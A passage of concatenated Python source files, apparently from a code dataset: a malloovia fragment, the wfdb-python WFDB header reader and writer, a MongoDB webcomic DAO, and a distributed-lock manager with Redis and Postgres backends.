for the corresponding app)
"""
perfs = []
for row in alloc.values:
perfs_row = []
for j, app_alloc in enumerate(row):
app = alloc.apps[j]
perfs_app = []
for i, _ in enumerate(app_alloc):
iclass = alloc.instance_classes[i]
perfs_app.append(app_alloc[i] * performances[iclass, app])
perfs_row.append(tuple(perfs_app))
perfs.append(tuple(perfs_row))
return alloc._replace(values=tuple(perfs), units="rph")
@compute_allocation_performance.register(SolutionI)
@compute_allocation_performance.register(SolutionII)
def __(
solution: Union[SolutionI, SolutionII]
) -> AllocationInfo: # pylint:disable=function-redefined
return compute_allocation_performance(
solution.allocation, solution.problem.performances.values
)
__all__ = [
"Status",
"MallooviaStats",
"SolvingStats",
"GlobalSolvingStats",
"AllocationInfo",
"ReservedAllocation",
"SolutionI",
"SolutionII",
"compute_allocation_cost",
"compute_allocation_performance",
]
|
asi-uniovi/malloovia
|
malloovia/solution_model.py
|
Python
|
mit
| 11,913
|
import datetime
import os
import re
import pdb
import numpy as np
import pandas as pd
from wfdb.io import download
from wfdb.io import _signal
"""
Notes
-----
In the original WFDB package, certain fields have default values, but
not all of them. Some attributes need to be present for core
functionality, i.e. baseline, whereas others are not essential, yet have
defaults, i.e. base_time.
This inconsistency has likely resulted in the generation of incorrect
files, and general confusion. This library aims to make explicit,
whether certain fields are present in the file, by setting their values
to None if they are not written in, unless the fields are essential, in
which case an actual default value will be set.
The read vs write default values are different for 2 reasons:
1. We want to force the user to be explicit with certain important
fields when writing WFDB records fields, without affecting
existing WFDB headers when reading.
2. Certain unimportant fields may be dependencies of other
important fields. When writing, we want to fill in defaults
so that the user doesn't need to. But when reading, it should
be clear that the fields are missing.
If all of the fields were filled out in a WFDB header file, they would appear
in this order with these separators:
RECORD_NAME/NUM_SEG NUM_SIG SAMP_FREQ/COUNT_FREQ(BASE_COUNT_VAL) SAMPS_PER_SIG BASE_TIME BASE_DATE
FILE_NAME FORMATxSAMP_PER_FRAME:SKEW+BYTE_OFFSET ADC_GAIN(BASELINE)/UNITS ADC_RES ADC_ZERO CHECKSUM BLOCK_SIZE DESCRIPTION
"""
int_types = (int, np.int64, np.int32, np.int16, np.int8)
float_types = (float, np.float64, np.float32) + int_types
_SPECIFICATION_COLUMNS = ['allowed_types', 'delimiter', 'dependency',
'write_required', 'read_default', 'write_default']
RECORD_SPECS = pd.DataFrame(
index=['record_name', 'n_seg', 'n_sig', 'fs', 'counter_freq',
'base_counter', 'sig_len', 'base_time', 'base_date'],
columns=_SPECIFICATION_COLUMNS,
dtype='object',
data=[[(str,), '', None, True, None, None], # record_name
[int_types, '/', 'record_name', True, None, None], # n_seg
[int_types, ' ', 'record_name', True, None, None], # n_sig
[float_types, ' ', 'n_sig', True, 250, None], # fs
[float_types, '/', 'fs', False, None, None], # counter_freq
[float_types, '(', 'counter_freq', False, None, None], # base_counter
[int_types, ' ', 'fs', True, None, None], # sig_len
[(datetime.time,), ' ', 'sig_len', False, None, '00:00:00'], # base_time
[(datetime.date,), ' ', 'base_time', False, None, None], # base_date
]
)
SIGNAL_SPECS = pd.DataFrame(
index=['file_name', 'fmt', 'samps_per_frame', 'skew', 'byte_offset',
'adc_gain', 'baseline', 'units', 'adc_res', 'adc_zero',
'init_value', 'checksum', 'block_size', 'sig_name'],
columns=_SPECIFICATION_COLUMNS,
dtype='object',
data=[[(str,), '', None, True, None, None], # file_name
[(str,), ' ', 'file_name', True, None, None], # fmt
[int_types, 'x', 'fmt', False, 1, None], # samps_per_frame
[int_types, ':', 'fmt', False, None, None], # skew
[int_types, '+', 'fmt', False, None, None], # byte_offset
[float_types, ' ', 'fmt', True, 200., None], # adc_gain
[int_types, '(', 'adc_gain', True, 0, None], # baseline
[(str,), '/', 'adc_gain', True, 'mV', None], # units
[int_types, ' ', 'adc_gain', False, None, 0], # adc_res
[int_types, ' ', 'adc_res', False, None, 0], # adc_zero
[int_types, ' ', 'adc_zero', False, None, None], # init_value
[int_types, ' ', 'init_value', False, None, None], # checksum
[int_types, ' ', 'checksum', False, None, 0], # block_size
[(str,), ' ', 'block_size', False, None, None], # sig_name
]
)
SEGMENT_SPECS = pd.DataFrame(
index=['seg_name', 'seg_len'],
columns=_SPECIFICATION_COLUMNS,
dtype='object',
data=[[(str), '', None, True, None, None], # seg_name
[int_types, ' ', 'seg_name', True, None, None], # seg_len
]
)
# Specifications of all WFDB header fields, except for comments
FIELD_SPECS = pd.concat((RECORD_SPECS, SIGNAL_SPECS, SEGMENT_SPECS))
# Regexp objects for reading headers
# Record line
_rx_record = re.compile(
r'''
[ \t]* (?P<record_name>[-\w]+)
/?(?P<n_seg>\d*)
[ \t]+ (?P<n_sig>\d+)
[ \t]* (?P<fs>\d*\.?\d*)
/*(?P<counter_freq>-?\d*\.?\d*)
\(?(?P<base_counter>-?\d*\.?\d*)\)?
[ \t]* (?P<sig_len>\d*)
[ \t]* (?P<base_time>\d{,2}:?\d{,2}:?\d{,2}\.?\d{,6})
[ \t]* (?P<base_date>\d{,2}/?\d{,2}/?\d{,4})
''', re.VERBOSE)
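# Hedged parsing note (not part of the original module): for a record line
# such as '100 2 360 650000', _rx_record.match(...).groups() yields
# ('100', '', '2', '360', '', '', '650000', '', ''); absent optional fields
# come back as empty strings.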
# Signal line
_rx_signal = re.compile(
r'''
[ \t]* (?P<file_name>~?[-\w]*\.?[\w]*)
[ \t]+ (?P<fmt>\d+)
x?(?P<samps_per_frame>\d*)
:?(?P<skew>\d*)
\+?(?P<byte_offset>\d*)
[ \t]* (?P<adc_gain>-?\d*\.?\d*e?[\+-]?\d*)
\(?(?P<baseline>-?\d*)\)?
/?(?P<units>[\w\^\-\?%\/]*)
[ \t]* (?P<adc_res>\d*)
[ \t]* (?P<adc_zero>-?\d*)
[ \t]* (?P<init_value>-?\d*)
[ \t]* (?P<checksum>-?\d*)
[ \t]* (?P<block_size>\d*)
[ \t]* (?P<sig_name>[\S]?[^\t\n\r\f\v]*)
''', re.VERBOSE)
# Segment line
_rx_segment = re.compile(
r'''
[ \t]* (?P<seg_name>[-\w]*~?)
[ \t]+ (?P<seg_len>\d+)
''', re.VERBOSE)
class BaseHeaderMixin(object):
"""
    Mixin class with header methods shared by single-segment and multi-segment
    records. Inherited by the Record and MultiRecord classes.
Attributes
----------
N/A
"""
def get_write_subset(self, spec_type):
"""
Get a set of fields used to write the header; either 'record'
or 'signal' specification fields. Helper function for
`get_write_fields`. Gets the default required fields, the user
defined fields, and their dependencies.
Parameters
----------
spec_type : str
The set of specification fields desired. Either 'record' or
'signal'.
Returns
-------
write_fields : list or dict
For record fields, returns a list of all fields needed. For
signal fields, it returns a dictionary of all fields needed,
with keys = field and value = list of channels that must be
present for the field.
"""
if spec_type == 'record':
write_fields = []
record_specs = RECORD_SPECS.copy()
# Remove the n_seg requirement for single segment items
if not hasattr(self, 'n_seg'):
record_specs.drop('n_seg', inplace=True)
for field in record_specs.index[-1::-1]:
# Continue if the field has already been included
if field in write_fields:
continue
# If the field is required by default or has been
# defined by the user
if (record_specs.loc[field, 'write_required']
or getattr(self, field) is not None):
req_field = field
# Add the field and its recursive dependencies
while req_field is not None:
write_fields.append(req_field)
req_field = record_specs.loc[req_field, 'dependency']
# Add comments if any
if getattr(self, 'comments') is not None:
write_fields.append('comments')
# signal spec field. Need to return a potentially different list for each channel.
elif spec_type == 'signal':
# List of lists for each channel
write_fields = []
signal_specs = SIGNAL_SPECS.copy()
for ch in range(self.n_sig):
# The fields needed for this channel
write_fields_ch = []
for field in signal_specs.index[-1::-1]:
if field in write_fields_ch:
continue
item = getattr(self, field)
# If the field is required by default or has been defined by the user
if signal_specs.loc[field, 'write_required'] or (item is not None and item[ch] is not None):
req_field = field
# Add the field and its recursive dependencies
while req_field is not None:
write_fields_ch.append(req_field)
req_field = signal_specs.loc[req_field, 'dependency']
write_fields.append(write_fields_ch)
# Convert the list of lists to a single dictionary.
# keys = field and value = list of channels in which the
# field is required.
dict_write_fields = {}
# For fields present in any channel:
for field in set([i for write_fields_ch in write_fields for i in write_fields_ch]):
dict_write_fields[field] = []
for ch in range(self.n_sig):
if field in write_fields[ch]:
dict_write_fields[field].append(ch)
write_fields = dict_write_fields
return write_fields
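    # Hedged shape note (not part of the original module): for the 'signal'
    # spec type on a hypothetical 2-channel record, the returned dictionary
    # might look like {'file_name': [0, 1], 'fmt': [0, 1], 'adc_gain': [0, 1]},
    # mapping each field to the channels that require it.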
class HeaderMixin(BaseHeaderMixin):
"""
Mixin class with single-segment header methods. Inherited by Record class.
Attributes
----------
N/A
"""
def set_defaults(self):
"""
Set defaults for fields needed to write the header if they have
defaults.
Parameters
----------
N/A
Returns
-------
N/A
Notes
-----
- This is NOT called by `rdheader`. It is only automatically
called by the gateway `wrsamp` for convenience.
- This is also not called by `wrheader` since it is supposed to
be an explicit function.
- This is not responsible for initializing the attributes. That
is done by the constructor.
See also `set_p_features` and `set_d_features`.
"""
rfields, sfields = self.get_write_fields()
for f in rfields:
self.set_default(f)
for f in sfields:
self.set_default(f)
def wrheader(self, write_dir=''):
"""
Write a WFDB header file. The signals are not used. Before
writing:
- Get the fields used to write the header for this instance.
- Check each required field.
- Check that the fields are cohesive with one another.
Parameters
----------
write_dir : str, optional
The output directory in which the header is written.
Returns
-------
N/A
Notes
-----
This function does NOT call `set_defaults`. Essential fields
must be set beforehand.
"""
# Get all the fields used to write the header
# sig_write_fields is a dictionary of
# {field_name:required_channels}
rec_write_fields, sig_write_fields = self.get_write_fields()
# Check the validity of individual fields used to write the header
# Record specification fields (and comments)
for field in rec_write_fields:
self.check_field(field)
# Signal specification fields.
for field in sig_write_fields:
self.check_field(field, required_channels=sig_write_fields[field])
# Check the cohesion of fields used to write the header
self.check_field_cohesion(rec_write_fields, list(sig_write_fields))
# Write the header file using the specified fields
self.wr_header_file(rec_write_fields, sig_write_fields, write_dir)
def get_write_fields(self):
"""
Get the list of fields used to write the header, separating
record and signal specification fields. Returns the default
required fields, the user defined fields, and their dependencies.
Does NOT include `d_signal` or `e_d_signal`.
Parameters
----------
N/A
Returns
-------
rec_write_fields : list
Record specification fields to be written. Includes
'comment' if present.
sig_write_fields : dict
Dictionary of signal specification fields to be written,
with values equal to the channels that need to be present
for each field.
"""
# Record specification fields
rec_write_fields = self.get_write_subset('record')
# Add comments if any
        if self.comments is not None:
rec_write_fields.append('comments')
# Get required signal fields if signals are present.
self.check_field('n_sig')
if self.n_sig > 0:
sig_write_fields = self.get_write_subset('signal')
else:
sig_write_fields = None
return rec_write_fields, sig_write_fields
def set_default(self, field):
"""
Set the object's attribute to its default value if it is missing
and there is a default. Not responsible for initializing the
attribute. That is done by the constructor.
Parameters
----------
field : str
The desired attribute of the object.
Returns
-------
N/A
"""
# Record specification fields
if field in RECORD_SPECS.index:
# Return if no default to set, or if the field is already
# present.
if RECORD_SPECS.loc[field, 'write_default'] is None or getattr(self, field) is not None:
return
setattr(self, field, RECORD_SPECS.loc[field, 'write_default'])
# Signal specification fields
# Setting entire list default, not filling in blanks in lists.
elif field in SIGNAL_SPECS.index:
# Specific dynamic case
if field == 'file_name' and self.file_name is None:
self.file_name = self.n_sig * [self.record_name + '.dat']
return
item = getattr(self, field)
# Return if no default to set, or if the field is already
# present.
if SIGNAL_SPECS.loc[field, 'write_default'] is None or item is not None:
return
# Set more specific defaults if possible
if field == 'adc_res' and self.fmt is not None:
self.adc_res = _signal._fmt_res(self.fmt)
return
setattr(self, field,
[SIGNAL_SPECS.loc[field, 'write_default']] * self.n_sig)
def check_field_cohesion(self, rec_write_fields, sig_write_fields):
"""
Check the cohesion of fields used to write the header.
Parameters
----------
rec_write_fields : list
List of record specification fields to write.
sig_write_fields : dict
Dictionary of signal specification fields to write, values
being equal to a list of channels to write for each field.
Returns
-------
N/A
"""
# If there are no signal specification fields, there is nothing to check.
        if self.n_sig > 0:
# The length of all signal specification fields must match n_sig
# even if some of its elements are None.
for f in sig_write_fields:
if len(getattr(self, f)) != self.n_sig:
raise ValueError('The length of field: '+f+' must match field n_sig.')
# Each file_name must correspond to only one fmt, (and only one byte offset if defined).
datfmts = {}
for ch in range(self.n_sig):
if self.file_name[ch] not in datfmts:
datfmts[self.file_name[ch]] = self.fmt[ch]
else:
if datfmts[self.file_name[ch]] != self.fmt[ch]:
raise ValueError('Each file_name (dat file) specified must have the same fmt')
datoffsets = {}
if self.byte_offset is not None:
# At least one byte offset value exists
for ch in range(self.n_sig):
if self.byte_offset[ch] is None:
continue
if self.file_name[ch] not in datoffsets:
datoffsets[self.file_name[ch]] = self.byte_offset[ch]
else:
if datoffsets[self.file_name[ch]] != self.byte_offset[ch]:
raise ValueError('Each file_name (dat file) specified must have the same byte offset')
def wr_header_file(self, rec_write_fields, sig_write_fields, write_dir):
"""
Write a header file using the specified fields. Converts Record
attributes into appropriate WFDB format strings.
Parameters
----------
rec_write_fields : list
List of record specification fields to write.
sig_write_fields : dict
Dictionary of signal specification fields to write, values
being equal to a list of channels to write for each field.
write_dir : str
The directory in which to write the header file.
Returns
-------
N/A
"""
# Create record specification line
record_line = ''
# Traverse the ordered dictionary
for field in RECORD_SPECS.index:
# If the field is being used, add it with its delimiter
if field in rec_write_fields:
string_field = str(getattr(self, field))
# Certain fields need extra processing
if field == 'fs' and isinstance(self.fs, float):
if round(self.fs, 8) == float(int(self.fs)):
string_field = str(int(self.fs))
elif field == 'base_time' and '.' in string_field:
string_field = string_field.rstrip('0')
elif field == 'base_date':
string_field = '/'.join((string_field[8:],
string_field[5:7],
string_field[:4]))
record_line += RECORD_SPECS.loc[field, 'delimiter'] + string_field
# The 'base_counter' field needs to be closed with ')'
if field == 'base_counter':
record_line += ')'
header_lines = [record_line]
# Create signal specification lines (if any) one channel at a time
if self.n_sig > 0:
signal_lines = self.n_sig * ['']
for ch in range(self.n_sig):
# Traverse the signal fields
for field in SIGNAL_SPECS.index:
# If the field is being used, add each of its
# elements with the delimiter to the appropriate
# line
if field in sig_write_fields and ch in sig_write_fields[field]:
signal_lines[ch] += SIGNAL_SPECS.loc[field, 'delimiter'] + str(getattr(self, field)[ch])
# The 'baseline' field needs to be closed with ')'
if field == 'baseline':
signal_lines[ch] += ')'
header_lines += signal_lines
# Create comment lines (if any)
if 'comments' in rec_write_fields:
comment_lines = ['# ' + comment for comment in self.comments]
header_lines += comment_lines
lines_to_file(self.record_name + '.hea', write_dir, header_lines)
class MultiHeaderMixin(BaseHeaderMixin):
"""
Mixin class with multi-segment header methods. Inherited by
MultiRecord class.
Attributes
----------
N/A
"""
def set_defaults(self):
"""
Set defaults for fields needed to write the header if they have
defaults. This is NOT called by rdheader. It is only called by the
gateway wrsamp for convenience. It is also not called by wrheader since
it is supposed to be an explicit function. Not responsible for
initializing the attributes. That is done by the constructor.
Parameters
----------
N/A
Returns
-------
N/A
"""
for field in self.get_write_fields():
self.set_default(field)
def wrheader(self, write_dir=''):
"""
Write a multi-segment WFDB header file. The signals or segments are
not used. Before writing:
- Get the fields used to write the header for this instance.
- Check each required field.
- Check that the fields are cohesive with one another.
Parameters
----------
write_dir : str, optional
The output directory in which the header is written.
Returns
-------
N/A
Notes
-----
This function does NOT call `set_defaults`. Essential fields
must be set beforehand.
"""
# Get all the fields used to write the header
write_fields = self.get_write_fields()
# Check the validity of individual fields used to write the header
for field in write_fields:
self.check_field(field)
# Check the cohesion of fields used to write the header
self.check_field_cohesion()
# Write the header file using the specified fields
self.wr_header_file(write_fields, write_dir)
def get_write_fields(self):
"""
Get the list of fields used to write the multi-segment header.
Parameters
----------
N/A
Returns
-------
write_fields : list
All the default required fields, the user defined fields,
and their dependencies.
"""
# Record specification fields
write_fields = self.get_write_subset('record')
# Segment specification fields are all mandatory
write_fields = write_fields + ['seg_name', 'seg_len']
# Comments
        if self.comments is not None:
write_fields.append('comments')
return write_fields
def set_default(self, field):
"""
Set a field to its default value if there is a default.
Parameters
----------
field : str
The desired attribute of the object.
Returns
-------
N/A
"""
        # Record specification fields
        if field in RECORD_SPECS.index:
            # Return if no default to set, or if the field is already present.
            if (RECORD_SPECS.loc[field, 'write_default'] is None
                    or getattr(self, field) is not None):
                return
            setattr(self, field, RECORD_SPECS.loc[field, 'write_default'])
def check_field_cohesion(self):
"""
Check the cohesion of fields used to write the header.
Parameters
----------
N/A
Returns
-------
N/A
"""
# The length of seg_name and seg_len must match n_seg
for f in ['seg_name', 'seg_len']:
if len(getattr(self, f)) != self.n_seg:
raise ValueError('The length of field: '+f+' does not match field n_seg.')
# Check the sum of the 'seg_len' fields against 'sig_len'
if np.sum(self.seg_len) != self.sig_len:
raise ValueError("The sum of the 'seg_len' fields do not match the 'sig_len' field")
def wr_header_file(self, write_fields, write_dir):
"""
Write a header file using the specified fields.
Parameters
----------
write_fields : list
All the default required fields, the user defined fields,
and their dependencies.
write_dir : str
The output directory in which the header is written.
Returns
-------
N/A
"""
# Create record specification line
record_line = ''
# Traverse the ordered dictionary
for field in RECORD_SPECS.index:
# If the field is being used, add it with its delimiter
if field in write_fields:
record_line += RECORD_SPECS.loc[field, 'delimiter'] + str(getattr(self, field))
header_lines = [record_line]
# Create segment specification lines
segment_lines = self.n_seg * ['']
# For both fields, add each of its elements with the delimiter
# to the appropriate line
for field in SEGMENT_SPECS.index:
for seg_num in range(self.n_seg):
segment_lines[seg_num] += SEGMENT_SPECS.loc[field, 'delimiter'] + str(getattr(self, field)[seg_num])
header_lines = header_lines + segment_lines
# Create comment lines (if any)
if 'comments' in write_fields:
comment_lines = ['# '+ comment for comment in self.comments]
header_lines += comment_lines
        lines_to_file(self.record_name + '.hea', write_dir, header_lines)
def get_sig_segments(self, sig_name=None):
"""
Get a list of the segment numbers that contain a particular signal
(or a dictionary of segment numbers for a list of signals).
Only works if information about the segments has been read in.
Parameters
----------
sig_name : str, list
The name of the signals to be segmented.
Returns
-------
sig_dict : dict
Segments for each desired signal.
sig_segs : list
Segments for the desired signal.
"""
if self.segments is None:
raise Exception("The MultiRecord's segments must be read in before this method is called. ie. Call rdheader() with rsegment_fieldsments=True")
# Default value = all signal names.
if sig_name is None:
sig_name = self.get_sig_name()
if isinstance(sig_name, list):
sig_dict = {}
for sig in sig_name:
sig_dict[sig] = self.get_sig_segments(sig)
return sig_dict
elif isinstance(sig_name, str):
sig_segs = []
for i in range(self.n_seg):
if self.seg_name[i] != '~' and sig_name in self.segments[i].sig_name:
sig_segs.append(i)
return sig_segs
else:
raise TypeError('sig_name must be a string or a list of strings')
def get_sig_name(self):
"""
Get the signal names for the entire record.
Parameters
----------
N/A
Returns
-------
sig_name : str, list
The name of the signals to be segmented.
"""
if self.segments is None:
raise Exception("The MultiRecord's segments must be read in before this method is called. ie. Call rdheader() with rsegment_fieldsments=True")
if self.layout == 'fixed':
for i in range(self.n_seg):
if self.seg_name[i] != '~':
sig_name = self.segments[i].sig_name
break
else:
sig_name = self.segments[0].sig_name
return sig_name
def wfdb_strptime(time_string):
"""
Given a time string in an acceptable WFDB format, return
a datetime.time object.
Valid formats: SS, MM:SS, HH:MM:SS, all with and without microsec.
Parameters
----------
time_string : str
The time to be converted to a datetime.time object.
Returns
-------
datetime.time object
The time converted from str format.
"""
    n_colons = time_string.count(':')
    if n_colons == 0:
        time_fmt = '%S'
    elif n_colons == 1:
        time_fmt = '%M:%S'
    elif n_colons == 2:
        time_fmt = '%H:%M:%S'
    else:
        raise ValueError('time_string may contain at most two colons')
if '.' in time_string:
time_fmt += '.%f'
return datetime.datetime.strptime(time_string, time_fmt).time()
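# Hedged usage note (not part of the original module):
#     wfdb_strptime('13:02:05')  # -> datetime.time(13, 2, 5)
#     wfdb_strptime('05.5')      # -> datetime.time(0, 0, 5, 500000)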
def _read_header_lines(base_record_name, dir_name, pn_dir):
"""
Read the lines in a local or remote header file.
Parameters
----------
base_record_name : str
The base name of the WFDB record to be read, without any file
extensions.
dir_name : str
The local directory location of the header file. This parameter
is ignored if `pn_dir` is set.
pn_dir : str
Option used to stream data from Physionet. The Physionet
database directory from which to find the required record files.
eg. For record '100' in 'http://physionet.org/content/mitdb'
pn_dir='mitdb'.
Returns
-------
header_lines : list
List of strings corresponding to the header lines.
comment_lines : list
List of strings corresponding to the comment lines.
"""
file_name = base_record_name + '.hea'
# Read local file
if pn_dir is None:
with open(os.path.join(dir_name, file_name), 'r', errors='ignore') as fp:
# Record line followed by signal/segment lines if any
header_lines = []
# Comment lines
comment_lines = []
for line in fp:
line = line.strip()
# Comment line
if line.startswith('#'):
comment_lines.append(line)
# Non-empty non-comment line = header line.
elif line:
# Look for a comment in the line
ci = line.find('#')
if ci > 0:
header_lines.append(line[:ci])
# comment on same line as header line
comment_lines.append(line[ci:])
else:
header_lines.append(line)
# Read online header file
else:
header_lines, comment_lines = download._stream_header(file_name,
pn_dir)
return header_lines, comment_lines
def _parse_record_line(record_line):
"""
Extract fields from a record line string into a dictionary.
Parameters
----------
record_line : str
        The record line string from which fields are extracted.
Returns
-------
record_fields : dict
The fields for the given record line.
"""
# Dictionary for record fields
record_fields = {}
# Read string fields from record line
match = _rx_record.match(record_line)
if match is None:
raise HeaderSyntaxError('invalid syntax in record line')
(record_fields['record_name'], record_fields['n_seg'],
record_fields['n_sig'], record_fields['fs'],
record_fields['counter_freq'], record_fields['base_counter'],
record_fields['sig_len'], record_fields['base_time'],
record_fields['base_date']) = match.groups()
for field in RECORD_SPECS.index:
# Replace empty strings with their read defaults (which are
# mostly None)
if record_fields[field] == '':
record_fields[field] = RECORD_SPECS.loc[field, 'read_default']
# Typecast non-empty strings for non-string (numerical/datetime)
# fields
else:
if RECORD_SPECS.loc[field, 'allowed_types'] == int_types:
record_fields[field] = int(record_fields[field])
elif RECORD_SPECS.loc[field, 'allowed_types'] == float_types:
record_fields[field] = float(record_fields[field])
# cast fs to an int if it is close
if field == 'fs':
fs = float(record_fields['fs'])
if round(fs, 8) == float(int(fs)):
fs = int(fs)
record_fields['fs'] = fs
elif field == 'base_time':
record_fields['base_time'] = wfdb_strptime(record_fields['base_time'])
elif field == 'base_date':
record_fields['base_date'] = datetime.datetime.strptime(
record_fields['base_date'], '%d/%m/%Y').date()
# This is not a standard WFDB field, but is useful to set.
if record_fields['base_date'] and record_fields['base_time']:
record_fields['base_datetime'] = datetime.datetime.combine(
record_fields['base_date'], record_fields['base_time'])
return record_fields
def _parse_signal_lines(signal_lines):
"""
Extract fields from a list of signal line strings into a dictionary.
Parameters
----------
signal_lines : list
        The signal line strings from which fields are extracted.
Returns
-------
signal_fields : dict
The fields for the given signal line.
"""
n_sig = len(signal_lines)
# Dictionary for signal fields
signal_fields = {}
# Each dictionary field is a list
for field in SIGNAL_SPECS.index:
signal_fields[field] = n_sig * [None]
# Read string fields from signal line
for ch in range(n_sig):
match = _rx_signal.match(signal_lines[ch])
if match is None:
raise HeaderSyntaxError('invalid syntax in signal line')
(signal_fields['file_name'][ch], signal_fields['fmt'][ch],
signal_fields['samps_per_frame'][ch], signal_fields['skew'][ch],
signal_fields['byte_offset'][ch], signal_fields['adc_gain'][ch],
signal_fields['baseline'][ch], signal_fields['units'][ch],
signal_fields['adc_res'][ch], signal_fields['adc_zero'][ch],
signal_fields['init_value'][ch], signal_fields['checksum'][ch],
signal_fields['block_size'][ch],
signal_fields['sig_name'][ch]) = match.groups()
for field in SIGNAL_SPECS.index:
# Replace empty strings with their read defaults (which are mostly None)
# Note: Never set a field to None. [None]* n_sig is accurate, indicating
# that different channels can be present or missing.
if signal_fields[field][ch] == '':
signal_fields[field][ch] = SIGNAL_SPECS.loc[field, 'read_default']
# Special case: missing baseline defaults to ADCzero if present
if field == 'baseline' and signal_fields['adc_zero'][ch] != '':
signal_fields['baseline'][ch] = int(signal_fields['adc_zero'][ch])
# Typecast non-empty strings for numerical fields
else:
if SIGNAL_SPECS.loc[field, 'allowed_types'] is int_types:
signal_fields[field][ch] = int(signal_fields[field][ch])
elif SIGNAL_SPECS.loc[field, 'allowed_types'] is float_types:
signal_fields[field][ch] = float(signal_fields[field][ch])
# Special case: adc_gain of 0 means 200
if field == 'adc_gain' and signal_fields['adc_gain'][ch] == 0:
signal_fields['adc_gain'][ch] = 200.
return signal_fields
def _read_segment_lines(segment_lines):
"""
Extract fields from segment line strings into a dictionary.
Parameters
----------
    segment_lines : list
        The segment line strings from which fields are extracted.
Returns
-------
segment_fields : dict
The fields for the given segment line.
"""
# Dictionary for segment fields
segment_fields = {}
# Each dictionary field is a list
for field in SEGMENT_SPECS.index:
segment_fields[field] = [None] * len(segment_lines)
    # Read string fields from the segment lines
    for i in range(len(segment_lines)):
        match = _rx_segment.match(segment_lines[i])
        if match is None:
            raise HeaderSyntaxError('invalid syntax in segment line')
        (segment_fields['seg_name'][i],
         segment_fields['seg_len'][i]) = match.groups()
        # Typecast the numerical seg_len field
        segment_fields['seg_len'][i] = int(segment_fields['seg_len'][i])
    return segment_fields
class HeaderSyntaxError(ValueError):
"""Invalid syntax found in a WFDB header file."""
def lines_to_file(file_name, write_dir, lines):
    """
    Write each line in a list of strings to a text file.
    Parameters
    ----------
    file_name : str
        The name of the text file to be written.
    write_dir : str
        The output directory in which the file is written.
    lines : list
        The lines to be written to the text file.
    Returns
    -------
    N/A
    """
    with open(os.path.join(write_dir, file_name), 'w') as f:
        for line in lines:
            f.write("%s\n" % line)
|
MIT-LCP/wfdb-python
|
wfdb/io/_header.py
|
Python
|
mit
| 36,630
|
from app.utils import readable
from pymongo import MongoClient
class WebcomicDao():
def __init__(self):
self.client = MongoClient('mongodb://localhost:27017/')
self.db = self.client.penny
    def create_comic(self, comic_id, initial_data):
        """
        Creates a new webcomic and returns its document as a dict
        """
        initial_data['_id'] = comic_id
        self.db.webcomics.insert_one(initial_data)
        return initial_data
def update_comic(self, comic_id, **kwargs):
ret = self.db.webcomics.update_one({
'_id': comic_id
}, {'$set': kwargs })
return ret
    def add_links(self, comic_id, content):
        # '$pushAll' was removed in MongoDB 3.6; '$push' with '$each' is the
        # supported way to append a list of links
        ret = self.db.webcomics.update_one({
            '_id': comic_id
        }, {
            '$push': {
                'links': {'$each': content}
            }
        })
        return ret
def get_comics_ids(self):
"""
Returns list of comic ids
"""
ret = self.db.webcomics.find({})
return [r.get('_id') for r in ret]
def get_comic_by_id(self, comic_id):
"""
Returns comic object from name
"""
ret = self.db.webcomics.find_one({
'_id': comic_id,
'is_active': True
})
return ret
    def get_comic_urls(self, comic_id):
        """
        Returns list of urls
        """
        comic = self.db.webcomics.find_one({
            '_id': comic_id
        }, {'links': 1})
        return comic.get('links', [])
def get_all_comics_meta_info(self):
"""
Returns list of {
'name': '',
'last_sync': 'time',
'links_count': 'count'
}
"""
comics = []
ret = self.db.webcomics.find({
'is_active': True
}, { '_id': 1, 'name': 1, 'last_sync': 1, 'links_count': 1 })
for comic in ret:
id = comic.get('_id')
name = comic.get('name')
links_count = comic.get('links_count')
last_sync = readable.from_ts(comic.get('last_sync')) \
if comic.get('last_sync') is not None else 'Never'
comics.append({
'id': id,
'name': name,
'last_sync': last_sync,
'links_count': links_count
})
return comics
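# Hedged usage sketch (not part of the original module): assumes a MongoDB
# server on localhost:27017 holding the 'penny' database, as the constructor
# expects. The comic id and links below are hypothetical.
#     dao = WebcomicDao()
#     dao.create_comic('xkcd', {'name': 'xkcd', 'is_active': True})
#     dao.add_links('xkcd', ['https://xkcd.com/1/', 'https://xkcd.com/2/'])
#     dao.get_comic_urls('xkcd')  # -> ['https://xkcd.com/1/', ...]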
|
arpitbbhayani/penny
|
app/dao/items/webcomicDao.py
|
Python
|
mit
| 2,415
|
from __future__ import unicode_literals
from .core.lock import Lock
from .core.errors import *
from .backends.redis_lox_backend import RedisLoxBackend
from .backends.postgres_lox_backend import PostgresLoxBackend
DEFAULT_LOX_CONFIG = {
"backend": {
"redis": "redis://:@localhost:6379/0"
}
}
class Lox(object):
"""
Main API for distributed locking, with schmear.
"""
def __init__(self, name=None, config=None):
# you might want to have multiple of these around, so allow naming each
self.name = name or "Lox"
# configuration: default to redis, for now
if not config:
self.config = DEFAULT_LOX_CONFIG
else:
self.config = config
# will hold a list of locks we're managing here
self.locks = {}
# will hold the lock when used as a context manager
self.context_lock = None
# may want to do lazy connection...
self.connect_backend()
def connect_backend(self):
self.backend = None
if "redis" in self.config.get("backend"):
self.backend = RedisLoxBackend(self.config)
elif "postgres" in self.config.get("backend"):
self.backend = PostgresLoxBackend(self.config)
if not self.backend:
raise BackendConfigException("No backend specified in settings.")
self.backend.connect()
def acquire(self, id=None, expires_seconds=None, retry=False, num_tries=None, retry_interval_seconds=None):
"""
Get a lock with the given ID, using the configured backend provider.
:param id: unique identifier for this lock, within this Lox instance.
:param expires_seconds: Automatically expire (i.e release) the lock after this number of seconds.
Defaults to never expire the lock based on a timer.
:param retry: if the lock cannot be acquired immediately, should we try to acquire it again later?
:param num_tries: try to get this lock this many times before giving up.
:param retry_interval_seconds: wait this number of seconds between retries.
:return: the acquired Lock object
"""
if id and id in self.locks:
raise LockAlreadyAcquiredException("Lock %s cannot be acquired more than once." % id)
lock = Lock(self, id)
self.locks[lock.id] = lock
return lock.acquire(expires_seconds=expires_seconds,
retry=retry,
num_tries=num_tries,
retry_interval_seconds=retry_interval_seconds)
def release(self, id=None):
"""
Release the lock with the given ID.
:param id: unique identifier for this lock, within this Lox instance
:return: the released lock object
"""
if not self.locks:
raise LockNotFoundException("No locks to release")
if id and id not in self.locks:
raise LockNotFoundException("Lock %s not found" % id)
# free it from the instance level tracking
lock = self.locks.pop(id)
return lock.release()
def clear_all(self):
"""
Purge all locks from the backend without releasing them.
This effectively resets the data store.
Should only be used for admin, testing, etc.
"""
        for id, lock in self.locks.items():
lock.clear()
self.locks = {}
def __enter__(self):
"""
Use Lox as a context manager.
"""
self.context_lock = self.acquire()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Use Lox as a context manager.
"""
self.context_lock.release()
